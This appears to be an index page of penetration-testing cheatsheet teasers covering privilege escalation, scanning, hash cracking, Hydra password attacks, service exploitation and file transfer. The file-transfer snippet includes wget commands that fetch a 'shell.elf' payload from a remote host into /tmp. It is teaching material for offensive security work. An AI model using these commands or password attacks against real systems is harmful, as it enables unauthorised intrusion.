Windows Privilege Escalation
Introduction This cheatsheet provides a structured methodology for identifying and exploiting Windows privilege escalation vectors. It includes commands, explanations, and a checklist approach for...
Information Gathering Tools WhatWeb # Basic scan whatweb target.com # Aggressive scan with detailed output whatweb -a 3 -v target.com # Export results to JSON whatweb -a 3 --log-json=results.js...
Table of Contents Introduction to Hash Cracking NTLM Hashes Unshadowing Custom Wordlists with CeWL Rule-Based Attacks with John Custom Rules in John Password Spray Attacks Default,...
Introduction Hydra is a fast and flexible online password cracking tool that supports numerous protocols including SSH, FTP, HTTP, SMB, and many others. This cheatsheet provides syntax and example...
Core Concepts Plaintext: The original, readable data before encryption. Ciphertext: The scrambled, unreadable result after encryption. Cipher: An algorithm or method used to perform encrypt...
Introduction This document provides a comprehensive guide for assessing and exploiting common network services during penetration testing. For each service, we’ll cover enumeration techniques, exp...
TCP/UDP Port States and Firewall Responses Open: Response: SYN-ACK for TCP, application response for UDP Firewall Behavior: Stateful firewalls track these as established connec...
TCP/UDP Port States Open: Port actively accepting connections; service is listening. Nmap receives positive response (SYN-ACK for TCP scans, relevant UDP response for UDP scans). Closed: Port...
Basic HTTP Transfers Wget # Download file wget http://10.10.10.1:8000/shell.elf # Download with custom output name wget http://10.10.10.1:8000/shell.elf -O /tmp/safe.bin # Download in background...
1. Initial Enumeration Basic System Information whoami id hostname uname -a cat /etc/os-release lscpu cat /etc/shells echo $PATH env Network Information ip a ifconfig or ip -a route or netstat...